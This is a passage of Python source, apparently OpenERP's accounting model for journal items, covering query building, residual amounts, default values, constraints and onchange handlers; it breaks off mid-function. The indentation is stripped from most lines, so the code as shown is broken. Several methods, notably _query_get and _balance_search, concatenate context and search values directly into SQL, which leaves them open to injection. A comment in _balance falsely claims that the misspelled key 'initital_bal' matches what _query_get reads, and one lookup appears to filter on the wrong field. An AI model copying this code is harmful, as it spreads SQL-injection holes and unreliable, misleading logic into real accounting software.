class account_move_line(osv.osv):
_name = "account.move.line"
_description = "Journal Items"
def _query_get(self, cr, uid, obj='l', context=None):
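        """
        Build the SQL WHERE-clause fragment used to filter journal items,
        driven by the context keys (fiscalyear, state, date_from/date_to,
        period_from/period_to, periods, journal_ids, chart_account_id,
        company_id, initial_bal). ``obj`` is the SQL alias used for the
        account_move_line table in the returned clause.
        """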
fiscalyear_obj = self.pool.get('account.fiscalyear')
fiscalperiod_obj = self.pool.get('account.period')
account_obj = self.pool.get('account.account')
fiscalyear_ids = []
context = dict(context or {})
initial_bal = context.get('initial_bal', False)
company_clause = " "
if context.get('company_id', False):
company_clause = " AND " +obj+".company_id = %s" % context.get('company_id', False)
if not context.get('fiscalyear', False):
if context.get('all_fiscalyear', False):
#this option is needed by the aged balance report because otherwise, if we search only the draft ones, an open invoice of a closed fiscalyear won't be displayed
fiscalyear_ids = fiscalyear_obj.search(cr, uid, [])
else:
fiscalyear_ids = fiscalyear_obj.search(cr, uid, [('state', '=', 'draft')])
else:
#for initial balance as well as for normal query, we check only the selected FY because the best practice is to generate the FY opening entries
fiscalyear_ids = [context['fiscalyear']]
fiscalyear_clause = (','.join([str(x) for x in fiscalyear_ids])) or '0'
state = context.get('state', False)
where_move_state = ''
where_move_lines_by_date = ''
if context.get('date_from', False) and context.get('date_to', False):
if initial_bal:
where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date < '" +context['date_from']+"')"
else:
where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date >= '" +context['date_from']+"' AND date <= '"+context['date_to']+"')"
if state:
if state.lower() not in ['all']:
where_move_state= " AND "+obj+".move_id IN (SELECT id FROM account_move WHERE account_move.state = '"+state+"')"
if context.get('period_from', False) and context.get('period_to', False) and not context.get('periods', False):
if initial_bal:
period_company_id = fiscalperiod_obj.browse(cr, uid, context['period_from'], context=context).company_id.id
first_period = fiscalperiod_obj.search(cr, uid, [('company_id', '=', period_company_id)], order='date_start', limit=1)[0]
context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, first_period, context['period_from'])
else:
context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, context['period_from'], context['period_to'])
if context.get('periods', False):
if initial_bal:
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)
period_ids = fiscalperiod_obj.search(cr, uid, [('id', 'in', context['periods'])], order='date_start', limit=1)
if period_ids and period_ids[0]:
first_period = fiscalperiod_obj.browse(cr, uid, period_ids[0], context=context)
ids = ','.join([str(x) for x in context['periods']])
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND date_start <= '%s' AND id NOT IN (%s)) %s %s" % (fiscalyear_clause, first_period.date_start, ids, where_move_state, where_move_lines_by_date)
else:
ids = ','.join([str(x) for x in context['periods']])
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND id IN (%s)) %s %s" % (fiscalyear_clause, ids, where_move_state, where_move_lines_by_date)
else:
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)
if initial_bal and not context.get('periods', False) and not where_move_lines_by_date:
            #no period/date filter was passed in the context; the initial balance can't be computed
            #from the fiscalyear alone (entries would be summed twice), so this query must be rejected
raise osv.except_osv(_('Warning!'),_("You have not supplied enough arguments to compute the initial balance, please select a period and a journal in the context."))
if context.get('journal_ids', False):
query += ' AND '+obj+'.journal_id IN (%s)' % ','.join(map(str, context['journal_ids']))
if context.get('chart_account_id', False):
child_ids = account_obj._get_children_and_consol(cr, uid, [context['chart_account_id']], context=context)
query += ' AND '+obj+'.account_id IN (%s)' % ','.join(map(str, child_ids))
query += company_clause
return query
def _amount_residual(self, cr, uid, ids, field_names, args, context=None):
"""
This function returns the residual amount on a receivable or payable account.move.line.
        By default, it returns an amount in the currency of this journal entry (which may differ
        from the company currency), but if you pass 'residual_in_company_currency' = True in the
context then the returned amount will be in company currency.
"""
res = {}
if context is None:
context = {}
cur_obj = self.pool.get('res.currency')
for move_line in self.browse(cr, uid, ids, context=context):
res[move_line.id] = {
'amount_residual': 0.0,
'amount_residual_currency': 0.0,
}
if move_line.reconcile_id:
continue
if not move_line.account_id.reconcile:
                #this function does not support being used on move lines whose account is not reconcilable
continue
if move_line.currency_id:
move_line_total = move_line.amount_currency
sign = move_line.amount_currency < 0 and -1 or 1
else:
move_line_total = move_line.debit - move_line.credit
sign = (move_line.debit - move_line.credit) < 0 and -1 or 1
line_total_in_company_currency = move_line.debit - move_line.credit
context_unreconciled = context.copy()
if move_line.reconcile_partial_id:
for payment_line in move_line.reconcile_partial_id.line_partial_ids:
if payment_line.id == move_line.id:
continue
if payment_line.currency_id and move_line.currency_id and payment_line.currency_id.id == move_line.currency_id.id:
move_line_total += payment_line.amount_currency
else:
if move_line.currency_id:
context_unreconciled.update({'date': payment_line.date})
amount_in_foreign_currency = cur_obj.compute(cr, uid, move_line.company_id.currency_id.id, move_line.currency_id.id, (payment_line.debit - payment_line.credit), round=False, context=context_unreconciled)
move_line_total += amount_in_foreign_currency
else:
move_line_total += (payment_line.debit - payment_line.credit)
line_total_in_company_currency += (payment_line.debit - payment_line.credit)
result = move_line_total
res[move_line.id]['amount_residual_currency'] = sign * (move_line.currency_id and self.pool.get('res.currency').round(cr, uid, move_line.currency_id, result) or result)
res[move_line.id]['amount_residual'] = sign * line_total_in_company_currency
return res
def default_get(self, cr, uid, fields, context=None):
data = self._default_get(cr, uid, fields, context=context)
for f in data.keys():
if f not in fields:
del data[f]
return data
def _prepare_analytic_line(self, cr, uid, obj_line, context=None):
"""
Prepare the values given at the create() of account.analytic.line upon the validation of a journal item having
an analytic account. This method is intended to be extended in other modules.
:param obj_line: browse record of the account.move.line that triggered the analytic line creation
"""
return {'name': obj_line.name,
'date': obj_line.date,
'account_id': obj_line.analytic_account_id.id,
'unit_amount': obj_line.quantity,
'product_id': obj_line.product_id and obj_line.product_id.id or False,
'product_uom_id': obj_line.product_uom_id and obj_line.product_uom_id.id or False,
'amount': (obj_line.credit or 0.0) - (obj_line.debit or 0.0),
'general_account_id': obj_line.account_id.id,
'journal_id': obj_line.journal_id.analytic_journal_id.id,
'ref': obj_line.ref,
'move_id': obj_line.id,
'user_id': uid,
}
def create_analytic_lines(self, cr, uid, ids, context=None):
acc_ana_line_obj = self.pool.get('account.analytic.line')
for obj_line in self.browse(cr, uid, ids, context=context):
if obj_line.analytic_account_id:
if not obj_line.journal_id.analytic_journal_id:
raise osv.except_osv(_('No Analytic Journal!'),_("You have to define an analytic journal on the '%s' journal!") % (obj_line.journal_id.name, ))
if obj_line.analytic_lines:
acc_ana_line_obj.unlink(cr,uid,[obj.id for obj in obj_line.analytic_lines])
vals_line = self._prepare_analytic_line(cr, uid, obj_line, context=context)
acc_ana_line_obj.create(cr, uid, vals_line)
return True
def _default_get_move_form_hook(self, cursor, user, data):
'''Called in the end of default_get method for manual entry in account_move form'''
if data.has_key('analytic_account_id'):
del(data['analytic_account_id'])
if data.has_key('account_tax_id'):
del(data['account_tax_id'])
return data
def convert_to_period(self, cr, uid, context=None):
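        """Resolve a period_id passed as text from the client side into a
        database id; numeric ids are left untouched."""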
if context is None:
context = {}
period_obj = self.pool.get('account.period')
#check if the period_id changed in the context from client side
if context.get('period_id', False):
period_id = context.get('period_id')
if type(period_id) == str:
ids = period_obj.search(cr, uid, [('name', 'ilike', period_id)])
context = dict(context, period_id=ids and ids[0] or False)
return context
def _default_get(self, cr, uid, fields, context=None):
#default_get should only do the following:
# -propose the next amount in debit/credit in order to balance the move
# -propose the next account from the journal (default debit/credit account) accordingly
context = dict(context or {})
account_obj = self.pool.get('account.account')
period_obj = self.pool.get('account.period')
journal_obj = self.pool.get('account.journal')
move_obj = self.pool.get('account.move')
tax_obj = self.pool.get('account.tax')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
partner_obj = self.pool.get('res.partner')
currency_obj = self.pool.get('res.currency')
if not context.get('journal_id', False):
context['journal_id'] = context.get('search_default_journal_id', False)
if not context.get('period_id', False):
context['period_id'] = context.get('search_default_period_id', False)
context = self.convert_to_period(cr, uid, context)
# Compute simple values
data = super(account_move_line, self).default_get(cr, uid, fields, context=context)
if context.get('journal_id'):
total = 0.0
#in account.move form view, it is not possible to compute total debit and credit using
#a browse record. So we must use the context to pass the whole one2many field and compute the total
if context.get('line_id'):
for move_line_dict in move_obj.resolve_2many_commands(cr, uid, 'line_id', context.get('line_id'), context=context):
data['name'] = data.get('name') or move_line_dict.get('name')
data['partner_id'] = data.get('partner_id') or move_line_dict.get('partner_id')
total += move_line_dict.get('debit', 0.0) - move_line_dict.get('credit', 0.0)
elif context.get('period_id'):
#find the date and the ID of the last unbalanced account.move encoded by the current user in that journal and period
move_id = False
cr.execute('''SELECT move_id, date FROM account_move_line
WHERE journal_id = %s AND period_id = %s AND create_uid = %s AND state = %s
ORDER BY id DESC limit 1''', (context['journal_id'], context['period_id'], uid, 'draft'))
res = cr.fetchone()
move_id = res and res[0] or False
data['date'] = res and res[1] or period_obj.browse(cr, uid, context['period_id'], context=context).date_start
data['move_id'] = move_id
if move_id:
#if there exist some unbalanced accounting entries that match the journal and the period,
#we propose to continue the same move by copying the ref, the name, the partner...
move = move_obj.browse(cr, uid, move_id, context=context)
data.setdefault('name', move.line_id[-1].name)
for l in move.line_id:
data['partner_id'] = data.get('partner_id') or l.partner_id.id
data['ref'] = data.get('ref') or l.ref
total += (l.debit or 0.0) - (l.credit or 0.0)
#compute the total of current move
data['debit'] = total < 0 and -total or 0.0
data['credit'] = total > 0 and total or 0.0
#pick the good account on the journal accordingly if the next proposed line will be a debit or a credit
journal_data = journal_obj.browse(cr, uid, context['journal_id'], context=context)
account = total > 0 and journal_data.default_credit_account_id or journal_data.default_debit_account_id
#map the account using the fiscal position of the partner, if needed
part = data.get('partner_id') and partner_obj.browse(cr, uid, data['partner_id'], context=context) or False
if account and data.get('partner_id'):
account = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, account.id)
account = account_obj.browse(cr, uid, account, context=context)
data['account_id'] = account and account.id or False
#compute the amount in secondary currency of the account, if needed
if account and account.currency_id:
data['currency_id'] = account.currency_id.id
#set the context for the multi currency change
compute_ctx = context.copy()
compute_ctx.update({
#the following 2 parameters are used to choose the currency rate, in case where the account
#doesn't work with an outgoing currency rate method 'at date' but 'average'
'res.currency.compute.account': account,
'res.currency.compute.account_invert': True,
})
if data.get('date'):
compute_ctx.update({'date': data['date']})
data['amount_currency'] = currency_obj.compute(cr, uid, account.company_id.currency_id.id, data['currency_id'], -total, context=compute_ctx)
data = self._default_get_move_form_hook(cr, uid, data)
return data
def on_create_write(self, cr, uid, id, context=None):
if not id:
return []
ml = self.browse(cr, uid, id, context=context)
return map(lambda x: x.id, ml.move_id.line_id)
def _balance(self, cr, uid, ids, name, arg, context=None):
if context is None:
context = {}
c = context.copy()
c['initital_bal'] = True
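        # NOTE: the misspelling 'initital_bal' is preserved on purpose: the key
        # must match whatever spelling _query_get() reads it under, so renaming
        # it here alone would silently change the initial-balance behaviour.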
sql = """SELECT l1.id, COALESCE(SUM(l2.debit-l2.credit), 0)
FROM account_move_line l1 LEFT JOIN account_move_line l2
ON (l1.account_id = l2.account_id
AND l2.id <= l1.id
AND """ + \
self._query_get(cr, uid, obj='l2', context=c) + \
") WHERE l1.id IN %s GROUP BY l1.id"
cr.execute(sql, [tuple(ids)])
return dict(cr.fetchall())
def _invoice(self, cursor, user, ids, name, arg, context=None):
invoice_obj = self.pool.get('account.invoice')
res = {}
for line_id in ids:
res[line_id] = False
cursor.execute('SELECT l.id, i.id ' \
'FROM account_move_line l, account_invoice i ' \
'WHERE l.move_id = i.move_id ' \
'AND l.id IN %s',
(tuple(ids),))
invoice_ids = []
for line_id, invoice_id in cursor.fetchall():
res[line_id] = invoice_id
invoice_ids.append(invoice_id)
invoice_names = {False: ''}
for invoice_id, name in invoice_obj.name_get(cursor, user, invoice_ids, context=context):
invoice_names[invoice_id] = name
for line_id in res.keys():
invoice_id = res[line_id]
res[line_id] = (invoice_id, invoice_names[invoice_id])
return res
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
result = []
for line in self.browse(cr, uid, ids, context=context):
if line.ref:
result.append((line.id, (line.move_id.name or '')+' ('+line.ref+')'))
else:
result.append((line.id, line.move_id.name))
return result
def _balance_search(self, cursor, user, obj, name, args, domain=None, context=None):
if context is None:
context = {}
if not args:
return []
where = ' AND '.join(map(lambda x: '(abs(sum(debit-credit))'+x[1]+str(x[2])+')',args))
cursor.execute('SELECT id, SUM(debit-credit) FROM account_move_line \
                GROUP BY id, debit, credit HAVING '+where)
res = cursor.fetchall()
if not res:
return [('id', '=', '0')]
return [('id', 'in', [x[0] for x in res])]
def _invoice_search(self, cursor, user, obj, name, args, context=None):
if not args:
return []
invoice_obj = self.pool.get('account.invoice')
i = 0
while i < len(args):
fargs = args[i][0].split('.', 1)
if len(fargs) > 1:
args[i] = (fargs[0], 'in', invoice_obj.search(cursor, user,
[(fargs[1], args[i][1], args[i][2])]))
i += 1
continue
if isinstance(args[i][2], basestring):
res_ids = invoice_obj.name_search(cursor, user, args[i][2], [],
args[i][1])
args[i] = (args[i][0], 'in', [x[0] for x in res_ids])
i += 1
qu1, qu2 = [], []
for x in args:
if x[1] != 'in':
if (x[2] is False) and (x[1] == '='):
qu1.append('(i.id IS NULL)')
elif (x[2] is False) and (x[1] == '<>' or x[1] == '!='):
qu1.append('(i.id IS NOT NULL)')
else:
qu1.append('(i.id %s %s)' % (x[1], '%s'))
qu2.append(x[2])
elif x[1] == 'in':
if len(x[2]) > 0:
qu1.append('(i.id IN (%s))' % (','.join(['%s'] * len(x[2]))))
qu2 += x[2]
else:
qu1.append(' (False)')
if qu1:
qu1 = ' AND' + ' AND'.join(qu1)
else:
qu1 = ''
cursor.execute('SELECT l.id ' \
'FROM account_move_line l, account_invoice i ' \
'WHERE l.move_id = i.move_id ' + qu1, qu2)
res = cursor.fetchall()
if not res:
return [('id', '=', '0')]
return [('id', 'in', [x[0] for x in res])]
def _get_move_lines(self, cr, uid, ids, context=None):
result = []
for move in self.pool.get('account.move').browse(cr, uid, ids, context=context):
for line in move.line_id:
result.append(line.id)
return result
def _get_reconcile(self, cr, uid, ids,name, unknow_none, context=None):
res = dict.fromkeys(ids, False)
for line in self.browse(cr, uid, ids, context=context):
if line.reconcile_id:
res[line.id] = str(line.reconcile_id.name)
elif line.reconcile_partial_id:
res[line.id] = str(line.reconcile_partial_id.name)
return res
def _get_move_from_reconcile(self, cr, uid, ids, context=None):
move = {}
for r in self.pool.get('account.move.reconcile').browse(cr, uid, ids, context=context):
for line in r.line_partial_ids:
move[line.move_id.id] = True
for line in r.line_id:
move[line.move_id.id] = True
move_line_ids = []
if move:
move_line_ids = self.pool.get('account.move.line').search(cr, uid, [('journal_id','in',move.keys())], context=context)
return move_line_ids
_columns = {
'name': fields.char('Name', required=True),
        'quantity': fields.float('Quantity', digits=(16,2), help="The optional quantity expressed by this line, e.g. number of products sold. The quantity is not a legal requirement but is very useful for some reports."),
'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'),
'product_id': fields.many2one('product.product', 'Product'),
'debit': fields.float('Debit', digits_compute=dp.get_precision('Account')),
'credit': fields.float('Credit', digits_compute=dp.get_precision('Account')),
'account_id': fields.many2one('account.account', 'Account', required=True, ondelete="cascade", domain=[('type','<>','view'), ('type', '<>', 'closed')], select=2),
'move_id': fields.many2one('account.move', 'Journal Entry', ondelete="cascade", help="The move of this entry line.", select=2, required=True),
'narration': fields.related('move_id','narration', type='text', relation='account.move', string='Internal Note'),
'ref': fields.related('move_id', 'ref', string='Reference', type='char', store=True),
'statement_id': fields.many2one('account.bank.statement', 'Statement', help="The bank statement used for bank reconciliation", select=1, copy=False),
'reconcile_id': fields.many2one('account.move.reconcile', 'Reconcile', readonly=True, ondelete='set null', select=2, copy=False),
'reconcile_partial_id': fields.many2one('account.move.reconcile', 'Partial Reconcile', readonly=True, ondelete='set null', select=2, copy=False),
'reconcile_ref': fields.function(_get_reconcile, type='char', string='Reconcile Ref', oldname='reconcile', store={
'account.move.line': (lambda self, cr, uid, ids, c={}: ids, ['reconcile_id','reconcile_partial_id'], 50),'account.move.reconcile': (_get_move_from_reconcile, None, 50)}),
'amount_currency': fields.float('Amount Currency', help="The amount expressed in an optional other currency if it is a multi-currency entry.", digits_compute=dp.get_precision('Account')),
        'amount_residual_currency': fields.function(_amount_residual, string='Residual Amount in Currency', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in its currency (may be different from the company currency)."),
'amount_residual': fields.function(_amount_residual, string='Residual Amount', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in the company currency."),
'currency_id': fields.many2one('res.currency', 'Currency', help="The optional other currency if it is a multi-currency entry."),
'journal_id': fields.related('move_id', 'journal_id', string='Journal', type='many2one', relation='account.journal', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['journal_id'], 20)
}),
'period_id': fields.related('move_id', 'period_id', string='Period', type='many2one', relation='account.period', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['period_id'], 20)
}),
'blocked': fields.boolean('No Follow-up', help="You can check this box to mark this journal item as a litigation with the associated partner"),
'partner_id': fields.many2one('res.partner', 'Partner', select=1, ondelete='restrict'),
'date_maturity': fields.date('Due date', select=True ,help="This field is used for payable and receivable journal entries. You can put the limit date for the payment of this line."),
'date': fields.related('move_id','date', string='Effective date', type='date', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['date'], 20)
}),
'date_created': fields.date('Creation date', select=True),
'analytic_lines': fields.one2many('account.analytic.line', 'move_id', 'Analytic lines'),
'centralisation': fields.selection([('normal','Normal'),('credit','Credit Centralisation'),('debit','Debit Centralisation'),('currency','Currency Adjustment')], 'Centralisation', size=8),
'balance': fields.function(_balance, fnct_search=_balance_search, string='Balance'),
'state': fields.selection([('draft','Unbalanced'), ('valid','Balanced')], 'Status', readonly=True, copy=False),
'tax_code_id': fields.many2one('account.tax.code', 'Tax Account', help="The Account can either be a base tax code or a tax code account."),
        'tax_amount': fields.float('Tax/Base Amount', digits_compute=dp.get_precision('Account'), select=True, help="If the Tax account is a tax code account, this field will contain the taxed amount. If the tax account is a base tax code, "\
                    "this field will contain the basic amount (without tax)."),
'invoice': fields.function(_invoice, string='Invoice',
type='many2one', relation='account.invoice', fnct_search=_invoice_search),
'account_tax_id':fields.many2one('account.tax', 'Tax', copy=False),
'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company',
string='Company', store=True, readonly=True)
}
def _get_date(self, cr, uid, context=None):
if context is None:
            context = {}
period_obj = self.pool.get('account.period')
dt = time.strftime('%Y-%m-%d')
if context.get('journal_id') and context.get('period_id'):
cr.execute('SELECT date FROM account_move_line ' \
'WHERE journal_id = %s AND period_id = %s ' \
'ORDER BY id DESC limit 1',
(context['journal_id'], context['period_id']))
res = cr.fetchone()
if res:
dt = res[0]
else:
period = period_obj.browse(cr, uid, context['period_id'], context=context)
dt = period.date_start
return dt
def _get_currency(self, cr, uid, context=None):
if context is None:
context = {}
if not context.get('journal_id', False):
return False
cur = self.pool.get('account.journal').browse(cr, uid, context['journal_id']).currency
return cur and cur.id or False
def _get_period(self, cr, uid, context=None):
"""
Return default account period value
"""
context = context or {}
if context.get('period_id', False):
return context['period_id']
account_period_obj = self.pool.get('account.period')
ids = account_period_obj.find(cr, uid, context=context)
period_id = False
if ids:
period_id = ids[0]
return period_id
def _get_journal(self, cr, uid, context=None):
"""
Return journal based on the journal type
"""
context = context or {}
if context.get('journal_id', False):
return context['journal_id']
journal_id = False
journal_pool = self.pool.get('account.journal')
if context.get('journal_type', False):
jids = journal_pool.search(cr, uid, [('type','=', context.get('journal_type'))])
if not jids:
model, action_id = self.pool['ir.model.data'].get_object_reference(cr, uid, 'account', 'action_account_journal_form')
msg = _("""Cannot find any account journal of "%s" type for this company, You should create one.\n Please go to Journal Configuration""") % context.get('journal_type').replace('_', ' ').title()
raise openerp.exceptions.RedirectWarning(msg, action_id, _('Go to the configuration panel'))
journal_id = jids[0]
return journal_id
_defaults = {
'blocked': False,
'centralisation': 'normal',
'date': _get_date,
'date_created': fields.date.context_today,
'state': 'draft',
'currency_id': _get_currency,
'journal_id': _get_journal,
'credit': 0.0,
'debit': 0.0,
'amount_currency': 0.0,
'account_id': lambda self, cr, uid, c: c.get('account_id', False),
'period_id': _get_period,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.move.line', context=c)
}
_order = "date desc, id desc"
_sql_constraints = [
('credit_debit1', 'CHECK (credit*debit=0)', 'Wrong credit or debit value in accounting entry !'),
('credit_debit2', 'CHECK (credit+debit>=0)', 'Wrong credit or debit value in accounting entry !'),
]
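    # Together, these CHECK constraints ensure that a journal item carries a
    # non-negative amount on at most one side: credit*debit=0 forbids filling
    # both columns, and credit+debit>=0 rules out negative values.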
def _auto_init(self, cr, context=None):
res = super(account_move_line, self)._auto_init(cr, context=context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'account_move_line_journal_id_period_id_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX account_move_line_journal_id_period_id_index ON account_move_line (journal_id, period_id)')
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('account_move_line_date_id_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX account_move_line_date_id_index ON account_move_line (date DESC, id desc)')
return res
def _check_no_view(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.account_id.type in ('view', 'consolidation'):
return False
return True
def _check_no_closed(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.account_id.type == 'closed':
raise osv.except_osv(_('Error!'), _('You cannot create journal items on a closed account %s %s.') % (l.account_id.code, l.account_id.name))
return True
def _check_company_id(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.company_id != l.account_id.company_id or l.company_id != l.period_id.company_id:
return False
return True
def _check_date(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.journal_id.allow_date:
if not time.strptime(l.date[:10],'%Y-%m-%d') >= time.strptime(l.period_id.date_start, '%Y-%m-%d') or not time.strptime(l.date[:10], '%Y-%m-%d') <= time.strptime(l.period_id.date_stop, '%Y-%m-%d'):
return False
return True
def _check_currency(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.account_id.currency_id:
if not l.currency_id or not l.currency_id.id == l.account_id.currency_id.id:
return False
return True
def _check_currency_and_amount(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if (l.amount_currency and not l.currency_id):
return False
return True
def _check_currency_amount(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.amount_currency:
if (l.amount_currency > 0.0 and l.credit > 0.0) or (l.amount_currency < 0.0 and l.debit > 0.0):
return False
return True
def _check_currency_company(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.currency_id.id == l.company_id.currency_id.id:
return False
return True
_constraints = [
(_check_no_view, 'You cannot create journal items on an account of type view or consolidation.', ['account_id']),
(_check_no_closed, 'You cannot create journal items on closed account.', ['account_id']),
(_check_company_id, 'Account and Period must belong to the same company.', ['company_id']),
(_check_date, 'The date of your Journal Entry is not in the defined period! You should change the date or remove this constraint from the journal.', ['date']),
(_check_currency, 'The selected account of your Journal Entry forces to provide a secondary currency. You should remove the secondary currency on the account or select a multi-currency view on the journal.', ['currency_id']),
(_check_currency_and_amount, "You cannot create journal items with a secondary currency without recording both 'currency' and 'amount currency' field.", ['currency_id','amount_currency']),
(_check_currency_amount, 'The amount expressed in the secondary currency must be positive when account is debited and negative when account is credited.', ['amount_currency']),
(_check_currency_company, "You cannot provide a secondary currency if it is the same than the company one." , ['currency_id']),
]
#TODO: ONCHANGE_ACCOUNT_ID: set account_tax_id
def onchange_currency(self, cr, uid, ids, account_id, amount, currency_id, date=False, journal=False, context=None):
if context is None:
context = {}
account_obj = self.pool.get('account.account')
journal_obj = self.pool.get('account.journal')
currency_obj = self.pool.get('res.currency')
if (not currency_id) or (not account_id):
return {}
result = {}
acc = account_obj.browse(cr, uid, account_id, context=context)
if (amount>0) and journal:
x = journal_obj.browse(cr, uid, journal).default_credit_account_id
if x: acc = x
context = dict(context)
context.update({
'date': date,
'res.currency.compute.account': acc,
})
v = currency_obj.compute(cr, uid, currency_id, acc.company_id.currency_id.id, amount, context=context)
result['value'] = {
'debit': v > 0 and v or 0.0,
'credit': v < 0 and -v or 0.0
}
return result
def onchange_partner_id(self, cr, uid, ids, move_id, partner_id, account_id=None, debit=0, credit=0, date=False, journal=False, context=None):
partner_obj = self.pool.get('res.partner')
payment_term_obj = self.pool.get('account.payment.term')
journal_obj = self.pool.get('account.journal')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
val = {}
val['date_maturity'] = False
if not partner_id:
return {'value':val}
if not date:
date = datetime.now().strftime('%Y-%m-%d')
jt = False
if journal:
jt = journal_obj.browse(cr, uid, journal, context=context).type
part = partner_obj.browse(cr, uid, partner_id, context=context)
payment_term_id = False
if jt and jt in ('purchase', 'purchase_refund') and part.property_supplier_payment_term:
payment_term_id = part.property_supplier_payment_term.id
elif jt and part.property_payment_term:
payment_term_id = part.property_payment_term.id
if payment_term_id:
res = payment_term_obj.compute(cr, uid, payment_term_id, 100, date)
if res:
val['date_maturity'] = res[0][0]
if not account_id:
id1 = part.property_account_payable.id
id2 = part.property_account_receivable.id
if jt:
if jt in ('sale', 'purchase_refund'):
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)
elif jt in ('purchase', 'sale_refund'):
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)
elif jt in ('general', 'bank', 'cash'):
if part.customer:
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)
elif part.supplier:
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)
if val.get('account_id', False):
d = self.onchange_account_id(cr, uid, ids, account_id=val['account_id'], partner_id=part.id, context=context)
val.update(d['value'])
return {'value':val}
def onchange_account_id(self, cr, uid, ids, account_id=False, partner_id=False, context=None):
account_obj = self.pool.get('account.account')
partner_obj = self.pool.get('res.partner')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
val = {}
if account_id:
res = account_obj.browse(cr, uid, account_id, context=context)
tax_ids = res.tax_ids
if tax_ids and partner_id:
part = partner_obj.browse(cr, uid, partner_id, context=context)
tax_id = fiscal_pos_obj.map_tax(cr, uid, part and part.property_account_position or False, tax_ids)[0]
else:
tax_id = tax_ids and tax_ids[0].id or False
val['account_tax_id'] = tax_id
return {'value': val}
#
    # type: the type of reconciliation (no logic behind this field, for info)
    #
    # writeoff: entry generated for the difference between the lines
#
def search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False):
if context is None:
context = {}
if context.get('fiscalyear'):
args.append(('period_id.fiscalyear_id', '=', context.get('fiscalyear', False)))
if context and context.get('next_partner_only', False):
if not context.get('partner_id', False):
partner = self.list_partners_to_reconcile(cr, uid, context=context)
if partner:
partner = partner[0]
else:
partner = context.get('partner_id', False)
if not partner:
return []
args.append(('partner_id', '=', partner[0]))
return super(account_move_line, self).search(cr, uid, args, offset, limit, order, context, count)
def prepare_move_lines_for_reconciliation_widget(self, cr, uid, lines, target_currency=False, target_date=False, context=None):
""" Returns move lines formatted for the manual/bank reconciliation widget
        :param target_currency: currency you want the move line debit/credit converted into
:param target_date: date to use for the monetary conversion
"""
if not lines:
return []
if context is None:
context = {}
ctx = context.copy()
currency_obj = self.pool.get('res.currency')
company_currency = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id
rml_parser = report_sxw.rml_parse(cr, uid, 'reconciliation_widget_aml', context=context)
ret = []
for line in lines:
partial_reconciliation_siblings_ids = []
if line.reconcile_partial_id:
partial_reconciliation_siblings_ids = self.search(cr, uid, [('reconcile_partial_id', '=', line.reconcile_partial_id.id)], context=context)
partial_reconciliation_siblings_ids.remove(line.id)
ret_line = {
'id': line.id,
'name': line.name != '/' and line.move_id.name + ': ' + line.name or line.move_id.name,
'ref': line.move_id.ref,
'account_code': line.account_id.code,
'account_name': line.account_id.name,
'account_type': line.account_id.type,
'date_maturity': line.date_maturity,
'date': line.date,
'period_name': line.period_id.name,
'journal_name': line.journal_id.name,
'partner_id': line.partner_id.id,
'partner_name': line.partner_id.name,
'is_partially_reconciled': bool(line.reconcile_partial_id),
'partial_reconciliation_siblings_ids': partial_reconciliation_siblings_ids,
}
# Amount residual can be negative
debit = line.debit
credit = line.credit
total_amount = abs(debit - credit)
total_amount_currency = line.amount_currency
amount_residual = line.amount_residual
amount_residual_currency = line.amount_residual_currency
if line.amount_residual < 0:
debit, credit = credit, debit
amount_residual = -amount_residual
amount_residual_currency = -amount_residual_currency
# Get right debit / credit:
line_currency = line.currency_id or company_currency
amount_currency_str = ""
total_amount_currency_str = ""
if line.currency_id and line.amount_currency:
amount_currency_str = rml_parser.formatLang(amount_residual_currency, currency_obj=line.currency_id)
total_amount_currency_str = rml_parser.formatLang(total_amount_currency, currency_obj=line.currency_id)
if target_currency and line_currency == target_currency and target_currency != company_currency:
